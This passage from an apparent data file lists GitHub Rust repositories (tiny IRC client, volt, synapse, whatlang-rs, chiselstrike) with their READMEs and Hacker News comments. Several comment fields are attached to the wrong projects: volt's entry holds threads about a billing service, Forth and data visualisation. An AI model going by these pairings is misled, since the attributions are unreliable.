(OpenSSL or LibreSSL), add `--no-default-features\n --features=tls-native` to the command you're using. Note that this requires\n OpenSSL or LibreSSL headers and runtime libraries on Linux.\n\n- To enable desktop notifications add `--features=desktop-notifications`. This\n requires libdbus on Linux.\n\nTo install in a clone:\n\n```\ncargo install --path crates/tiny\n```\n\nIf you don't want to clone the repo, you can use\n\n```\ncargo install --git https://github.com/osa1/tiny\n```\n\nIf you have an older version installed, add `--force` to the command you're\nusing.\n\nArch Linux users can install tiny from [AUR].\n\n[AUR]: https://aur.archlinux.org/packages/tiny-irc-client-git/\n\ntiny is tested on Linux and OSX.\n\n## Configuration\n\ntiny looks for these places for a config file:\n\n- On Linux: `$XDG_CONFIG_HOME/tiny/config.yml`, on macOS:\n `$HOME/Library/Application Support/tiny/config.yml`\n- (when not found) `$HOME/.config/tiny/config.yml`\n- (when not found, deprecated) `$HOME/.tinyrc.yml`\n\nWhen a config file is not found in one of these locations tiny creates one in\nthe first path above with defaults and exits, printing path to the config file.\nEdit that file before re-running tiny to change the defaults.\n\n**A note on nick identification:** Some IRC servers such as ircd-seven (used by\nFreenode) and InspIRCd (used by Mozilla) support identification via the `PASS`\ncommand. This way of identification (rather than sending a message to a service\nlike `NickServ`) is better when some of the channels that you automatically\njoin require identification. To use this method enter your nick password to the\n`pass` field in servers.\n\n### Using external commands for passwords\n\nWhen a password field in the config file is a map with a `command` key, the\nvalue is used as the shell command to run to get the password.\n\nFor example, in this config:\n\n```yaml\nsasl:\n username: osa1\n password:\n command: 'pass show \"my irc password\"'\n```\n\ntiny runs the `pass ...` command and uses last line printed by the command as\nthe password.\n\n## Command line arguments\n\nBy default (i.e. when no command line arguments passed) tiny connects to all\nservers listed in the config. tiny considers command line arguments as patterns\nto be matched in server addresses, so you can pass command line arguments to\nconnect to only a subset of servers specified in the config. For example, in\nthis config:\n\n```yaml\nservers:\n - addr: chat.freenode.net\n ...\n\n - addr: irc.gnome.org\n ...\n```\n\nBy default tiny connects to both servers. You can connect to only the first\nserver by passing `freenode` as a command line argument.\n\nYou can use `--config ` to specify your config file location.\n\n## Key bindings\n\nKey bindings can be configured in the config file, see the [wiki\npage][key-bindings-wiki] for details.\n\nDefault key bindings:\n\n- `C-a`/`C-e` move cursor to beginning/end in the input field\n\n- `C-k` delete rest of the line\n\n- `C-w` delete a word backwards\n\n- `C-left`/`C-right` move one word backward/forward\n\n- `page up`/`page down`, `shift-up`/`shift-down`, or `C-u`/`C-d` to scroll\n\n- `C-n`/`C-p` next/previous tab\n\n- `C-c enter` quit (asks for confirmation)\n\n- `alt-{1,9}` switch to nth tab\n\n- `alt-{char}` switch to next tab with underlined `char`\n\n- `alt-0` switch to last tab\n\n- `alt-left/right` move tab to left/right\n\n- `C-x` edit current message in `$EDITOR`\n\n[key-bindings-wiki]: https://github.com/osa1/tiny/wiki/Configuring-key-bindings\n\n## Commands\n\nCommands start with `/` character.\n\n- `/help`: Show help messages of commands listed below.\n\n- `/msg `: Send a message to a user. Creates a new tab.\n\n- `/join `: Join to a channel\n\n- `/close`: Close the current tab. Leaves the channel if the current tab is a\n channel. Leaves the server if the tab is a server. You can use `/close ` to send a goodbye message.\n\n- `/connect :`: Connect to a server. Uses `defaults` in the\n config file for nick, realname, hostname and auto cmds.\n\n- `/connect`: Reconnect to the current server. Use if you don't want to wait\n tiny to reconnect automatically after a connectivity problem.\n\n- `/away `: Set away status\n\n- `/away`: Remove away status\n\n- `/nick `: Change nick\n\n- `/names`: List all nicks in the current channel. You can use `/names ` to\n check if a specific nick is in the channel.\n\n- `/reload`: Reload TUI configuration\n\n- `/clear`: Clears tab contents\n\n- `/switch `: Switch to the first tab which has the given string in the name.\n\n- `/ignore`: Ignore `join/quit` messages in a channel. Running this command in\n a server tab applies it to all channels of that server. You can check your\n ignore state in the status line.\n\n- `/notify [off|mentions|messages]`: Enable and disable desktop notifications.\n Running this command in a server tab applies it to all channels of that\n server. You can check your notify state in the status line.\n\n- `/quit`: Quit. You can use `/quit ` to send a goodbye message.\n\n## Server commands\n\nFor commands not supported by tiny as a slash command, sending the command in\nthe server tab will send the message directly to the server.\n\n### Examples:\n\n- `LIST` will list all channels on the server\n- `MOTD` will display the server Message of the Day\n- `RULES` will display server rules\n- etc...\n\n## Community\n\nJoin us at #tiny in [irc.oftc.net][oftc] to chat about anything related to tiny!\n\n[oftc]: https://www.oftc.net/\n", "readme_type": "markdown", "hn_comments": "I\u2019m curious. Anyone know how this compares to irssi and other common irc clients?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dimensionhq/volt", "link": "https://github.com/dimensionhq/volt", "tags": ["package-manager", "rust", "javascript", "node", "js", "fast", "new", "volt", "hacktoberfest"], "stars": 825, "description": "An experimental package management tool for JavaScript. Upto 30x faster installation of dependencies using pre-flattened dependency trees.", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\n\n

Volt

\n

Rapid, reliable and robust Javascript package management.

\n
\n\n

\n \n

\n
\n\n\n\nWARNING: Volt is still in the development stage and is not ready for use!\n\n**Rapid**: Volt is incredibly fast and powerful.\n\n**Reliable**: Volt is built to be reliable and dependable.\n\n**Robust**: Volt works with low resource usage.\n\n**Important**: Volt is still in the alpha stage of development, and is not ready for use in production or development environments.\n
\n\n# :zap: Installation\n\nWe don't have an official release of Volt yet, however, if you would like to give it a try, feel free to follow the steps below to build from source.\n
\n\n## Build From Source\n\nPrerequisites: **Git**, **Rust Toolchain**\n\n### Minimum Supported Rust Version (MSRV)\n\nRust 1.58\n\n### Steps\n\n1. Clone the github repository using the Github CLI.\n\n```powershell\ngit clone https://github.com/voltpkg/volt\n```\n\n2. Change to the `volt` directory.\n\n```powershell\ncd volt\n```\n\n3. Run a compiled and optimized build\n\n```\ncargo run --release -- --help\n# you should see a help menu from Volt\n```\n\n
\n\n## :test_tube: Testing\n\nFirst, make sure you [**Build From Source**](https://github.com/voltpkg/volt/#build-from-source).\n\nRun this command to run the tests for volt.\n\n```powershell\ncargo test\n```\n\n
\n\n## :clap: Supporters\n\n[![Stargazers repo roster for @voltpkg/volt](https://reporoster.com/stars/voltpkg/volt)](https://github.com/voltpkg/volt/stargazers)\n\n[![Forkers repo roster for @voltpkg/volt](https://reporoster.com/forks/voltpkg/volt)](https://github.com/voltpkg/volt/network/members)\n\n
\n\n## :hammer: Build Status\n\n| Feature | Build Status |\n| -------- | ------------ |\n| Add | \ud83c\udfd7\ufe0f |\n| Audit | \u274c |\n| Cache | \u274c |\n| Check | \u274c |\n| Clone | \ud83c\udfd7\ufe0f |\n| Compress | \ud83c\udfd7\ufe0f |\n| Create | \ud83c\udfd7\ufe0f |\n| Deploy | \ud83c\udfd7\ufe0f |\n| Fix | \u274c |\n| Help | \ud83c\udfd7\ufe0f |\n| Info | \u274c |\n| Init | \ud83c\udfd7\ufe0f |\n| Install | \ud83c\udfd7\ufe0f |\n| List | \ud83c\udfd7\ufe0f |\n| Login | \ud83c\udfd7\ufe0f |\n| Logout | \u274c |\n| Migrate | \ud83c\udfd7\ufe0f |\n| Mod | \u274c |\n| Outdated | \u274c |\n| Owner | \u274c |\n| Ping | \ud83c\udfd7\ufe0f |\n| Publish | \u274c |\n| Remove | \u274c |\n| Run | \ud83c\udfd7\ufe0f |\n| Search | \u274c |\n| Set | \u274c |\n| Stat | \u274c |\n| Tag | \u274c |\n| Team | \u274c |\n| Update | \u274c |\n| Watch | \ud83c\udfd7\ufe0f |\n\n
\n\n## Built With\n\n[Rust](https://www.rust-lang.org/)\n\n[External Libraries](https://github.com/voltpkg/volt/blob/dev/CREDITS.md)\n\n## Versioning\n\nWe use [semver](https://semver.org/) for versioning. For the versions available, see the [tags on this repository](https://github.com/voltpkg/volt/tags).\n\n## License\n\nThis project is licensed under Apache-2.0 - see the [LICENSE.md](LICENSE) file for details.\n", "readme_type": "markdown", "hn_comments": "Heads up, you forgot to handle confused deputy in your IAM Role policy: (In 'Configuring IAM role' at https://docs.paigo.tech/ can't link to a page), which means anyone can pass a role (e.g. for another user) and you'll assume it.Check out https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-de... for how to handle it. You need to require and use an 'ExternalId'.Super excited to see you launching here Dan, wishing you the best of luck!Much needed! Congrats on the launch, Daniel and Matt.> Matt and I came to this project after we built similar internal billing systems at previous jobs and we realized how error-prone these systems can be\u2014one incident might have even undercharged a client by a few million dollars!A BigCloud provider (no points for guessing) I worked for found about how they were undercharging customers due to a bug, and so, they fixed the bug for new customers, but continued to undercharge customers grandfathered in.> However this allows us to Pull, any custom metrics and dimensions directly from your Datastore.Most SaaS providers would rather push data than have it pulled, is what I'd imagine. Are you hearing otherwise from folks you've been speaking with? For instance, in serverless environments (which is the poison of choice for me, at least), pull is much harder to accomplish, even where possible.> All of this data is then processed and sent to our backend usage journal, where we store it in an append-only ledger pattern.Apparently, a BigCloud, in perhaps a case of NIH, ended up creating a highly-parallel event-queue as a direct result of the scale it was dealing with: https://archive.is/IUKvT Curious to hear how you deal with the barrage of multi-dimensional events?> Additionally, we also help you understand your cost to serve your clients\u2019 usage, and this data allows us to provide your SaaS with usage based billing.2 cents: Fly.io Machines is a tremendous platform atop which I fully expect businesses to build multiple successful SaaS products; may be that's one niche for you folks to focus on and own.> We bill based on invoiced revenue (surprise surprise its usage based) and we have a platform fee, roughly it breaks down to 1% of invoiced revenue on Paigo.This sounds a bit steep. I know for a fact that togai.com are also in private beta (their choice of datastore is TimescaleDB, and event-store is NATS), but unsure what their pricing model is; I'd be surprised if it is the same as paigo's.Congrats on launching a product of this complexity! Best of luck.I'm staring down the barrel of a potential usage pricing implementation, and I'm glad the majority of the foundational work is already done. It'd be no cakewalk to implement from scratch.How do you generally address the risks of read access, GDPR, and other similar security and privacy concerns related to your technical model?FYI your \"stateless and signupless demo\" link isn't linking and copying/pasting the link didn't work.Do you act as merchant of record (to handle VAT)?\nThere are so many solutions out there that use Stripe for billing which involves so much extra work for European founders.So basically this is Subscription/Recurring Invoice based on usage/metered billing. SaaS/Hosting provider/Electricity provider etcTry/Check Zoho Subscriptions (I am happy customer of \"Zoho Subscriptions\") - They support Many features, metered billing, Payment Methods, Many Integrations etc. Without taking much data (except what is needed minimal). And very good tech as well as non-tech customer support! And they charge reasonably fixed, transparent and predictive price.I understand need and pain point and multiple players can exist, Key is to have transparent pricing. (You can always have custom plan/discount/ change in pricing in future etc for future customer).Also who is your target customer? \nTech company may likely implement their own billing software or use existing proven players.I think (Happy to be wrong!) - \n1. Trying to find Non-Core-Tech/Offline subscriptions service and what are their pain points? \n2. Why only usage based billing?I know there are very less tools/software for SaaS/recurring/Subscriptions based billing (Zoho, Chargebee, Recurly, Shopify few of them) so wish you good luck.Congrats Daniel and Matt - great to see you guys hit this milestone :)> Matt and I came to this project after we built similar internal billing systems at previous jobs and we realized how error-prone these systems can be\u2014one incident might have even undercharged a client by a few million dollars!This honestly doesn't lend me the confidence in your solution that I assume you think it does ;P. \"We've done this before, and dude... we failed at it SO BAD, you just don't understand: this is HARD. So, instead of doing it yourself, you'd be much better off out-sourcing that effort... to us.\" :( It is a subtle difference, I admit, between versions of this pitch that work and the ones that don't, but this one just didn't work for me.Sounds useful. Not sure I\u2019d trade a 1% reduction in revenue across the board for this though.I'm curious how you'd compare yourselves to https://metronome.com which is another player in the space?A technical question:I'm curious how you ship, aggregate and store usage data in a resilient (network partition tolerant), scalable and cost efficient way.Your documentation doesn't seem to peak under the hood.(Disclaimer: I'm currently building such a system, but using a third party wouldn't be viable in that context)Perhaps view of data at different locality scales in different windows?figure 2 of subspace explorer in https://www.cs.uic.edu/~wilkinson/Publications/visualpattern...Pick your statistical software package & chart to generate code for!\nhttps://chartmaker.visualisingdata.comSome stories not safe for work viewing!\nLongform data journalism stories (aka visual statistics case studies): https://pudding.cool/Small corrolation of book covers (~5,000) : https://pudding.cool/2019/07/book-covers/On the 'more animated' side of things : https://hypertools.readthedocs.io/en/latest/**different visual demonstrations : https://www.datavis.ca/gallery/delights.phpEdward Tufte has looked at various ways to present data : https://www.amazon.com/Edward-R-Tufte/e/B000APET3Y/ref=aufs_... / https://www.edwardtufte.com/tufte/**Make the quantum leap and use fennman diagrams to construct the network ( https://www.ias.edu/ideas/2009/arkani-hamed-oconnell-feynman... )**So, could take the idea of scatter plot matrix in https://www.cs.uic.edu/~wilkinson/Publications/sorting.pdfand use the various plots to literally build a picture as represented in Excel cells as \"picture\" : https://www.youtube.com/watch?v=UBX2QQHlQ_Iandhttps://jpg.space/mmmatto/exhibition/Mathcastles-%3E-Sandcas...Hypercastle explorer for terraforms : https://www.youtube.com/watch?v=1jD6F_6_YakAlthough, that kind of starts to get into coding. ;)https://direct.mit.edu/leon/article-abstract/48/4/375/45993/...http://lightpattern.info/https://esolangs.org/wiki/ObjectArthttps://www.dangermouse.net/esoteric/piet.html**Obligitory HN 'lisp' link : https://web.archive.org/web/20110504131632/http://sas.uwater...Meta-visualization / statistical use cases links site : https://www.tableau.com/learn/articlessample links:https://www.tableau.com/learn/articles/data-science-blogshttps://www.tableau.com/learn/articles/best-data-visualizati...Many great new avenues of inquiry here - I thought the thread had died for lack of interest. Thanks to everyone!Gephi [1] is a software suite to visualize social media datasets.Demo / feature pages [2][3] show different approaches to visualizing different social media datasets.Uncertain about current status of software support/development.-----------------------[1] https://en.wikipedia.org/wiki/Gephi[2] http://www.martingrandjean.ch/gephi-introduction/[3] Gephi home page : https://github.com/gephi/gephi/releasesLocality means make a lot of comments in the same threads. Note that it will make close contacts people that agree a lot and also people that disagree a lot.I'd try using the 2nd and 3rd eigenvector of the Laplacian of gtaph. I heard a lot of good properties of them, but I never used them so I'm not sure how tricky is to get a nice graph. Something like https://math.stackexchange.com/questions/3853424/what-does-t...This is a super-interesting question.I don't think it is quite the answer to your question, but I have seen combined heatmaps/dendrograms that feel like a possibility for this? Maybe the heatmap deals with activity between nodes and the dendrogram handles the community cluster relationships? I see them often in bioinformaticsEx: https://en.wikipedia.org/wiki/Dendrogram#/media/File:Heatmap...https://digitalarrtarchive.siggraph.org/exhibition/siggraph-...https://arxiv.org/abs/1806.09823 - you can use this to find nearest neighbors to reduce the number of elements you are considering (or maybe not). Then you need: https://en.wikipedia.org/wiki/Dimensionality_reductionamazing! sounds very intrestingTop line:\n> Fleet is the blazing fast build toolMy primate pattern-matching brain says this is functionality-poor compared to its alternatives, or the alternatives it compares to are poor examples.I\u2019m excited to see this! Given that sccache integrates with cloud storage, this looks fairly straightforward to integrate in a CI/CD workflow, did I get that right?Not to be confused with https://www.jetbrains.com/fleet/As noted by another HN user, it's clear that this doesn't do anything interesting on Linux. Also, higher codegen units will produce slower code at times. Overall, on Linux I do not notice any significant improvement in build times (we already use sccache)The site and repo readme are quite light on details on how this works.Does it do anything else besides using sccache and lld/zld? I'd expect so, since these tools don't require rust nightly, whereas fleet does.---Edit:After a quick look over the code, it also sets codegen units to 256, but doesn't seem to do anything else.I see the same improvements adding manually sccache and mold to ~/.cargo/config.toml when building volt, without touching the repo's Cargo.toml.standard rust config: 1m20ssccache + mold: 30sI ran the tests with Rust 1.60.0, on Linux, on an AMD 5850U (6 core, mobile).I installed it via the cargo install method, do I have to do anything else like modify cargo config files?Nice, faster rust builds are always welcome.I wonder if in the future some service might even offer prebuilt crates for the various architectures. I think that idea was brought up at some point.> For a production repository (infinyon/fluvio) which we tested, we were able to cut down our incremental build times from 29 seconds down to 9 seconds, boosted by Fleet. We saw even better results on dimensionhq/volt, with our build times cut down from 3 minutes to just 1 minute - a 3x speed improvement!Not sure your maths are correct here.which flavor of Forth should I look at if I don't want to deal with the historical page sizes? (not sure of the nomenclature since I last looked at Forth)And here's an archive of what appears to be all issues of \"Forth Dimensions\": http://soton.mpeforth.com/flag/fd/contents.htmlEnjoy.Hey if you're looking to try writing some simple forth code in a fun context I recommend you try playing grobotshttp://grobots.sourceforge.net/I recommend you do the basics of the tutorial, then watching some matches with the provided sides.https://grobots.fandom.com/wiki/Tutorials/BeginnerOn the other hand, according to this[0] author who ported a game from assembly to C and Forth, Forth seems to drastically increase development time and perform 10-20 times worse than the equivalent assembly.[0] http://calc6502.com/RobotGame/summary.htmlFlipping through this magazine just made me realize how much I miss computer magazines and hacking culture in the 80s/90s.I was developing Open Boot - the Forth-based firmware that eventually became Open Firmware AKA the IEEE 1275-1994 Standard - at Sun back in the late '80s. It was intended to replace Sun's existing \"sunmon\" firmware which was written in C. The diagnostics group that maintained sunmon was adamantly opposed to Open Boot, probably mainly because it threated their ownership of the firmware. The argued against Open Boot, thinking that they had an ironclad argument: \"Forth is interpreted therefore it is too slow\". The argument totally backfired because I knew some facts about the hardware that had apparently escaped them. The dominant factor in the perceived firmware speed was scrolling text on the non-accelerated megapixel frame buffer. That involved a megapixel memory-to-memory copy for every line. On the monochrome display it was terrible and on the color frame buffer it was horrendous. The sunmon firmware ran from EPROM, whose access time was glacial compared to RAM and even worse compared to cache - and EPROM was not cacheable. To make matters even worse, on the SPARCstation 1 that was the first target for Open Boot, the EPROM data width was only 8 bits, so a 32-bit instruction fetch took 4 super slow EPROM accesses. You see where I am going with this, right? All it took to leave sunmon in the dust was to copy the screen-scrolling and bitblt routines into RAM. Just to pour salt on the wound, I also copied the modest-sized set of code words at the core of Forth into RAM. Direct-threaded Forth ran from RAM substantially faster than compiled C code ran from EPROM. Our project manager did not let me turn on the cache on the first shipment, worrying about bugs, but relented on later revisions. After the cache was turned on, Forth just flew. The fact that Forth is so well-factored, and the actual machine code is confined to a small compact area, meant that the cache performed extremely well. Furthermore, since Forth didn't need to use the SPARC register windowing mechanism - register windows were designed for C-style stack frames and are essentially useless for Forth stacks - the endemic SPARC problem of window spill and fill handlers didn't affect the firmware at all. That made the firmware much more adept at post-mortem examination of kernel crashes.In a lot of system code, the performance can be dominated by access to devices that are much slower than cache. In that environment, so long as you are careful about a few CPU intensive routines like memcpy and bitblt, threaded code can be nearly as fast as compiled code, and sometimes faster. And it is much more compact, which matters a lot when you have to fit everything into some flavor of ROM.Whoever likes Forth, might really enjoy Postscript (yeah, that printer-oriented language). It is probably the most used stack-based language around.If you haven't ever used Forth or made a Forth interpreter, it's a fun project that I recommend doing.I don't remember a lot about Forth, except this. After programming in (8-bit) assembler for about a year, I tried Forth. Getting the -code done- in -so little- time, I grinned broadly as I played Frisbee in that saved time.There's no way to save time like that any more; the computer's done -before- you finish typing 'run'. (Well, ok, infinite loops aren't any faster, just get -much closer to infinity. I postulate.)Anyway, those old mags always bring back that sense of WHOA! (I still have Kilobaud #1 and #2.)Why people are speaking a lot about Forth this year? Nothing against (I love Forth), just curious.Forth isn't slow because it can be compiled to machine code, which is not even touched on by the article.The main argument of the article seems to be reiterating the idea that in a tree, most of the nodes are leaves. For instance, in a balanced binary tree containing 2^n-1 nodes, a little over half the nodes are leaves. So if we visualize the call graph as traversing a tree, where the leaves are primary primitives in machine language, the bulk of the activity is always going on in the machine language leaves. When a primitive operation returns, much of the time control soon passes to another primitive operation, staying near the bottom of the tree.Browsing the web: ignores every ad, installs blockersReading old computer magazines: reads every ad, considers if copies of ancient literature still existI suppose it's too easy to game :(How do you plan to get users to install the extension? Why not cut out the \"user\" and just buy the data from internet providers?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Luminarys/synapse", "link": "https://github.com/Luminarys/synapse", "tags": [], "stars": 822, "description": "Synapse BitTorrent Daemon", "lang": "Rust", "repo_lang": "", "readme": "# synapse\n[![Rust Build](https://github.com/Luminarys/synapse/actions/workflows/rust.yml/badge.svg)](https://github.com/Luminarys/synapse/actions/workflows/rust.yml)\n\n\nSynapse is a flexible and fast BitTorrent daemon.\n\nIt currently supports most systems which implement epoll or kqueue, with a focus on 64-bit linux servers.\n\n## About\n* Event based RPC using websockets\n* HTTP downloads and TLS for easy server usage\n* Can be used via web client with minimal setup - see [receptor](https://web.synapse-bt.org)\n* See [this wiki page](https://github.com/Luminarys/synapse/wiki/Feature-Stability) for an overview of stability\n\n## Installation\n### Package\nA list of packages can be found on [this wiki page](https://github.com/Luminarys/synapse/wiki/Third-party-packages).\n\n### Compiling\nInstall dependencies:\n\n- rustc >= 1.39.0\n- cargo >= 0.18\n- gcc | clang\n\nSynapse and sycli can be installed with:\n```\ncargo build --release --all\ncargo install --path .\ncargo install --path ./sycli/\n```\n\nIf you'd just like to install sycli:\n```\ncargo build --release -p sycli\ncargo install --path ./sycli/\n```\n\n## Configuration\nSynapse expects its configuration file to be present at `$XDG_CONFIG_DIR/synapse.toml`,\nor `~/.config/synapse.toml`.\nIf it is not present or invalid, a default configuration will be used.\nThese defaults are given in `example_config.toml`.\n\nSycli can be configured in a similar manner, using `sycli.toml`.\n\n### Desktop application\n\nCopy [`share/synapse/applications/synapse.desktop`] to `$XDG_DATA_HOME/applications` or `~/.local/share/applications`.\n\n[`share/synapse/applications/synapse.desktop`]: share/synapse/applications/synapse.desktop\n\n[XDG MIME Applications] example configuration:\n\n`~/.config/mimeapps.list`\n\n``` ini\n[Default Applications]\nx-scheme-handler/magnet=synapse.desktop\n```\n\n[XDG MIME Applications]: https://wiki.archlinux.org/index.php/XDG_MIME_Applications\n\n## Development\nPlease see [this issue](https://github.com/Luminarys/synapse/issues/1) for details on development status.\nIf you're interested in developing a client for synapse, see `doc/RPC` for the current RPC spec.\nif you'd like to contribute to synapse, see `doc/HACKING`.\n", "readme_type": "markdown", "hn_comments": "It would be great to have a client that works well for seeding massive amounts of torrents (100,000+) on weak hardware (like a Raspberry). The main problem seems to be memory usage.How is the memory usage of this one?It says it is light-weight. What kind of light-weight is it and are there some metrics?Awesome work, congrats!Doesn\u2019t seem to solve any new problemNot that I'm not always eager to see something get rewritten in Rust, but I'm curious whether web browsers have advanced to the point where a bittorrent client could exist as a webapp rather than requiring native installation. Could the bittorrent protocol operate over WebRTC?For automation software, transmission (BitTorrent-client written in python, slow) seems to be the standard.If it could offer a transmission-compatible API-layer, I bet it would receive much more interest.Edit: apparently not written in python. My bad.So, if I understand this correctly, Rust would be a good fit for bittorrent, right?\nHandling lots of stuff simultaneously, peers, trackers etc, to me a bittorrent that actually does more than download and quit always seems like something quite heavy...> in RustSaying what language a program uses only describes its grammar and runtime. Saying what dialect a program uses also describes its idioms.https://en.wikipedia.org/wiki/Programming_idiomFor (a simple) example, actix-web uses actix, a library that largely changes the nature of writing Rust code. This might be called Rust-a or Rust', or something.https://github.com/actix/actix-webMy point is that Rust is a really cool language where \"the(/some) (sub)community(ies)\" are developing and coalescing around great libraries outside of core std, making a very* robust language, or rather robust language dialect.Interesting ! I tried integrating transmission for downloading content in a video wall app and it was a bit of a nightmare.Hopefully this will be better - please have a sane remote API.One thing that Azeurus did really well, that transmission really did not -You could can tell azeurus to re-check all the files that are there so it can find out how far it's got.In Azeurus I used this to reconstruct a large torrent by adding files that I found, then telling it to re-check.Transmission couldn't even tell if the files the torrent pointed at had been deleted from under it.Unfortunate name clash (https://github.com/matrix-org/synapse)", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "greyblake/whatlang-rs", "link": "https://github.com/greyblake/whatlang-rs", "tags": ["language", "rust", "nlp", "text-analysis", "text-classification", "classifier", "ai", "detect-language", "language-recognition", "whatlang", "algorithm", "text-classifier", "rustlang"], "stars": 822, "description": "Natural language detection library for Rust. Try demo online: https://whatlang.org/", "lang": "Rust", "repo_lang": "", "readme": "

\"Whatlang

\n\n

Whatlang

\n\n

Natural language detection for Rust with focus on simplicity and performance.

\n

Try online demo.

\n\n

\n\"Build\n\"License\"\n\"Documentation\"\n

\n\n[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://stand-with-ukraine.pp.ua/)\n\n## Content\n* [Features](#features)\n* [Get started](#get-started)\n* [Who uses Whatlang?](#who-uses-whatlang)\n* [Documentation](https://docs.rs/whatlang)\n* [Supported languages](https://github.com/greyblake/whatlang-rs/blob/master/SUPPORTED_LANGUAGES.md)\n* [Feature toggles](#feature-toggles)\n* [How does it work?](#how-does-it-work)\n * [How language recognition works?](#how-language-recognition-works)\n * [How is_reliable calculated?](#how-is_reliable-calculated)\n* [Running benchmark](#running-benchmarks)\n* [Comparison with alternatives](#comparison-with-alternatives)\n* [Ports and clones](#ports-and-clones)\n* [Donations](#donations)\n* [Derivation](#derivation)\n* [License](#license)\n* [Contributors](#contributors)\n\n\n## Features\n* Supports [69 languages](https://github.com/greyblake/whatlang-rs/blob/master/SUPPORTED_LANGUAGES.md)\n* 100% written in Rust\n* Lightweight, fast and simple\n* Recognizes not only a language, but also a script (Latin, Cyrillic, etc)\n* Provides reliability information\n\n## Get started\n\nExample:\n\n```rust\nuse whatlang::{detect, Lang, Script};\n\nfn main() {\n let text = \"\u0108u vi ne volas eklerni Esperanton? Bonvolu! Estas unu de la plej bonaj aferoj!\";\n\n let info = detect(text).unwrap();\n assert_eq!(info.lang(), Lang::Epo);\n assert_eq!(info.script(), Script::Latin);\n assert_eq!(info.confidence(), 1.0);\n assert!(info.is_reliable());\n}\n```\n\nFor more details (e.g. how to blacklist some languages) please check the [documentation](https://docs.rs/whatlang).\n\n## Who uses Whatlang?\n\nWhatlang is used within the following big projects as direct or indirect dependency for language recognition.\nYou're gonna be in a great company using Whatlang:\n\n* [Sonic](https://github.com/valeriansaliou/sonic) - fast, lightweight and schema-less search backend in Rust.\n* [Meilisearch](https://github.com/meilisearch) - an open-source, easy-to-use, blazingly fast, and hyper-relevant search engine built in Rust.\n\n## Feature toggles\n\n| Feature | Description |\n|-------------|---------------------------------------------------------------------------------------|\n| `enum-map` | `Lang` and `Script` implement `Enum` trait from [enum-map](https://docs.rs/enum-map/) |\n| `arbitrary` | Support [Arbitrary](https://crates.io/crates/arbitrary) |\n| `dev` | Enables `whatlang::dev` module which provides some internal API.
It exists for profiling purposes and normal users are discouraged to to rely on this API. |\n\n## How does it work?\n\n### How does the language recognition work?\n\nThe algorithm is based on the trigram language models, which is a particular case of n-grams.\nTo understand the idea, please check the original whitepaper [Cavnar and Trenkle '94: N-Gram-Based Text Categorization'](https://www.researchgate.net/publication/2375544_N-Gram-Based_Text_Categorization).\n\n### How is `is_reliable` calculated?\n\nIt is based on the following factors:\n* How many unique trigrams are in the given text\n* How big is the difference between the first and the second(not returned) detected languages? This metric is called `rate` in the code base.\n\nTherefore, it can be presented as 2d space with threshold functions, that splits it into \"Reliable\" and \"Not reliable\" areas.\nThis function is a hyperbola and it looks like the following one:\n\n\"Language\n\nFor more details, please check a blog article [Introduction to Rust Whatlang Library and Natural Language Identification Algorithms](https://www.greyblake.com/blog/introduction-to-rust-whatlang-library-and-natural-language-identification-algorithms/).\n\n## Make tasks\n\n* `make bench` - run performance benchmarks\n* `make doc` - generate and open doc\n* `make test` - run tests\n* `make watch` - watch changes and run tests\n\n## Comparison with alternatives\n\n| | Whatlang | CLD2 | CLD3 |\n| ------------------------- | ---------- | ----------- | -------------- |\n| Implementation language | Rust | C++ | C++ |\n| Languages | 68 | 83 | 107 |\n| Algorithm | trigrams | quadgrams | neural network |\n| Supported Encoding | UTF-8 | UTF-8 | ? |\n| HTML support | no | yes | ? |\n\n\n## Ports and clones\n\n* [whatlang-ffi](https://github.com/greyblake/whatlang-ffi) - C bindings\n* [whatlanggo](https://github.com/abadojack/whatlanggo) - whatlang clone for Go language\n* [whatlang-py](https://github.com/cathalgarvey/whatlang-py) - bindings for Python\n* [whatlang-rb](https://gitlab.com/KitaitiMakoto/whatlang-rb) - bindings for Ruby\n* [whatlangex](https://github.com/pierrelegall/whatlangex) - bindings for Elixir\n\n## Donations\n\nYou can support the project by donating [NEAR tokens](https://near.org).\n\nOur NEAR wallet address is `whatlang.near`\n\n## Derivation\n\n**Whatlang** is a derivative work from [Franc](https://github.com/wooorm/franc) (JavaScript, MIT) by [Titus Wormer](https://github.com/wooorm).\n\n## License\n\n[MIT](https://github.com/greyblake/whatlang-rs/blob/master/LICENSE) \u00a9 [Sergey Potapov](http://greyblake.com/)\n\n\n## Contributors\n\n- [greyblake](https://github.com/greyblake) Potapov Sergey - creator, maintainer.\n- [Dr-Emann](https://github.com/Dr-Emann) Zachary Dremann - optimization and improvements\n- [BaptisteGelez](https://github.com/BaptisteGelez) Baptiste Gelez - improvements\n- [Vishesh Chopra](https://github.com/KarmicKonquest) - designed the logo\n- [Joel Natividad](https://github.com/jqnatividad) - support of Tagalog\n- [ManyTheFish](https://github.com/ManyTheFish) - crazy optimization\n- [Kerollmops](https://github.com/Kerollmops) Cl\u00e9ment Renault - crazy optimization\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "chiselstrike/chiselstrike", "link": "https://github.com/chiselstrike/chiselstrike", "tags": ["framework", "javascript", "runtime", "typescript", "backend", "rust"], "stars": 822, "description": "ChiselStrike abstracts common backends components like databases and message queues, and let you drive them from a convenient TypeScript business logic layer", "lang": "Rust", "repo_lang": "", "readme": "![banner](imgs/logo.png)\n\n---\n\n[![Build Status](https://github.com/chiselstrike/chiselstrike/workflows/Rust/badge.svg?event=push&branch=main)](https://github.com/chiselstrike/chiselstrike/actions)\n[![License](https://img.shields.io/badge/license-Apache%202.0-blue)](https://github.com/chiselstrike/chiselstrike/blob/master/LICENSE)\n[![Discord](https://img.shields.io/discord/933071162680958986?color=5865F2&label=discord&logo=discord&logoColor=8a9095)](https://discord.gg/GHNN9CNAZe)\n[![Twitter](https://img.shields.io/twitter/follow/chiselstrike?style=plastic)](https://twitter.com/chiselstrike)\n\n## What is ChiselStrike?\n\nChiselStrike is a complete backend bundled in one piece. Your one stop-shop for all\nyour backend needs, powered by TypeScript.\n\n## Why ChiselStrike?\n\nPutting together a backend is hard work. Databases? ORM? Business logic? Data\naccess policies? 